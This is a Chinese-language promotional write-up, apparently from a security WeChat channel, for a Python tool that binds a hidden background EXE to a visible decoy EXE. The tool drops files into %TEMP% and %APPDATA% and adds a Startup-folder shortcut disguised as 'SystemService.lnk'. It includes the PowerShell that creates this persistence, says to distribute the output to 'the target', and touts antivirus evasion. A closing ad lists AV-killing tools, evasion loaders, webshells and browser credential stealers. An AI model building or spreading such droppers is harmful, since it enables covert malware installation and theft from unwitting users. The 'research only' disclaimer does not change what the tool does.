Python EXE捆绑启动器 v2.0:双EXE合体 + 自启动持久化
把两个EXE合并成一个,一个后台静默跑,一个前台正常显示,还能自动加开机启动。纯Python + Tkinter + PyInstaller,带图形界面,一键打包。
📦 核心功能
1️⃣ 双EXE捆绑
选择两个EXE文件:
运行时先启动后台程序,0.3秒后自动启动前台程序,用户只会看到"正常"的那个EXE。
2️⃣ 附加文件支持
除了两个主EXE,还支持为每个程序添加 任意数量的附加文件:
所有文件都以 Base64 编码嵌入到最终生成的启动器脚本中,确保单文件分发。
3️⃣ 自启动持久化
捆绑后的EXE首次运行时,会自动执行以下操作:
1. 释放后台EXE到 %TEMP% 目录2. 释放所有附加文件到 %TEMP% 目录3. 将后台EXE和附件复制到 %APPDATA%\Microsoft\Windows\4. 在启动文件夹创建快捷方式 SystemService.lnk → 设置 WindowStyle=7(最小化运行) → 开机自动启动后台程序5. 立即启动后台程序(隐藏窗口)6. 启动前台程序(正常显示)
4️⃣ 图形化界面
基于 Tkinter 构建的现代化 GUI,包含:
🏗️ 技术架构
文件嵌入机制
┌──────────────────────────────────────┐│ launcher.py (生成物) ││ ││ ┌──────────┐ ┌──────────────────┐ ││ │ 后台EXE │ │ 前台EXE │ ││ │ Base64 │ │ Base64 │ ││ └──────────┘ └──────────────────┘ ││ ┌──────────┐ ┌──────────────────┐ ││ │ 后台附加 │ │ 前台附加 │ ││ │ [n个] │ │ [n个] │ ││ └──────────┘ └──────────────────┘ ││ ││ ┌──────────────────────────────────┐││ │ 启动逻辑 + 自启动注册代码 │││ └──────────────────────────────────┘│└──────────────────────────────────────┘ │ PyInstaller -F ▼ merged.exe(单文件)
关键技术点
| |
|---|
| |
| subprocess.CREATE_NO_WINDOW |
| PowerShell 调用 WScript.Shell 创建 .lnk 快捷方式 |
| 后台EXE启动失败时自动重试3次,每次间隔0.2秒 |
| %APPDATA%\Microsoft\Windows\ |
运行流程图
用户双击 merged.exe │ ▼┌─ 释放后台EXE到 %TEMP%├─ 释放后台附加文件到 %TEMP%├─ 释放前台EXE到 %TEMP%├─ 释放前台附加文件到 %TEMP%├─ 注册自启动(复制到APPDATA + 创建快捷方式)├─ 隐藏启动后台EXE(重试3次)└─ 正常启动前台EXE用户视角:只看到前台EXE的窗口后台:后台EXE静默运行 + 开机自启动
🚀 如何使用
环境准备
pip install pyinstaller
操作步骤
Step 1 — 运行构建工具
python builder1_自启动_无弹窗_有黑框_UI.py
Step 2 — 在界面中选择文件
Step 3 — 点击「✅ 生成捆绑EXE」
工具会自动:
- 调用 PyInstaller 打包为
dist/merged.exe
Step 4 — 分发
将 dist/merged.exe 分发给目标即可,无需其他依赖文件。

✨ 项目亮点
| |
|---|
| 单文件分发 | |
| 纯Python实现 | |
| 图形化操作 | |
| 灵活附加文件 | |
| 自启动持久化 | 一键设置开机自启,快捷方式伪装为SystemService |
| 重试容错 | |
| 模块化设计 | 构建器(Builder)和启动器(Launcher)分离,便于定制 |
🛡️ 技术原理深度解析
自启动持久化实现
工具通过 PowerShell 调用 Windows COM 对象创建快捷方式:
# 创建 WScript.Shell COM 对象$ws = New-Object -ComObject WScript.Shell$sc = $ws.CreateShortcut("启动路径\SystemService.lnk")# 设置快捷方式属性$sc.TargetPath = "后台EXE路径"$sc.WorkingDirectory = "工作目录"$sc.WindowStyle = 7# 最小化窗口$sc.Save()
伪装名称 SystemService.lnk 让普通用户难以察觉。
文件释放安全写入
defsafe_write(path, data):try:with open(path, "wb") as f: f.write(data)returnTrueexcept Exception:returnFalse
所有文件释放都经过异常捕获,确保单个文件写入失败不会影响整体流程。
免杀效果


⚠️ 免责声明
本项目仅供 安全研究和学习交流 使用,请勿用于任何违法用途。使用者需自行承担所有法律责任,项目作者不对任何滥用行为负责。
圈子内获取 关注微信公众号后台回复入群 即可加入星夜AI安全交流群
圈子介绍
现任职于某头部网络安全企业攻防研究部,核心红队成员。2021-2023年间累计参与40+场国家级、行业级攻防实战演练,精通漏洞挖掘、红蓝对抗策略制定、恶意代码分析、内网横向渗透及应急响应等技术领域。在多次大型演练中,主导突破多个高防护目标网络,曾获“最佳攻击手”“突出贡献个人”等荣誉。
已产出的安全工具及成果包括:
- 多款主流杀软通杀工具(兼容卡巴斯基、诺顿、瑞星、360等终端防护,无感知运行,突破多引擎联合检测)
- XXByPassBehinder v1.1 冰蝎免杀生成器(定制化冰蝎免杀工具,绕过主流终端防护与EDR动态检测,支持自定义载荷)
- 哥斯拉二开免杀定制版(二开优化,深度免杀,突破终端防护与EDR检测,适配多场景植入)
- NeoCS4.9终极版(高级免杀加载工具,强化载荷注入与进程劫持,适配多系统版本,无兼容问题)
- WinDump_免杀版(浏览器凭证窃取工具,支持Chrome/Edge/Firefox等主流浏览器,一键提取敏感数据,免杀过防护)_
- _DumpBrowser_V1_免杀版(浏览器凭证窃取工具,专攻浏览器密码、Cookie、历史记录提取,免杀性能拉满)
- fscan二开版(二开优化内网扫描工具,增强指纹精度、弱口令爆破与结果标准化输出,适配复杂内网)
- RingQ加载器二开版(二开优化免杀加载器,支持Shellcode内存执行,绕过各类终端防护与EDR检测)
- 多款免杀Webshell集合(覆盖PHP/JSP/ASPX,过主流WAF与终端防护,适配不同Web场景)
- 免杀360专属加载器(支持Shellcode内存执行,针对性绕过360全系防护检测,无感知运行)
- 一键Kill 火绒 defender 工具 HDKiller(包含源码)
- win11 一键kill 360工具 InjectKill(包含源码)
- win11 一键kill defender工具win11_df-killer(包含源码)
- 免杀火绒6.0内存防护加载器BypassMemLoader
- 单文件过360 免杀loader exe_bypass_360
- 单文件过火绒 df 免杀loader exe_bypass_df(包含源码)

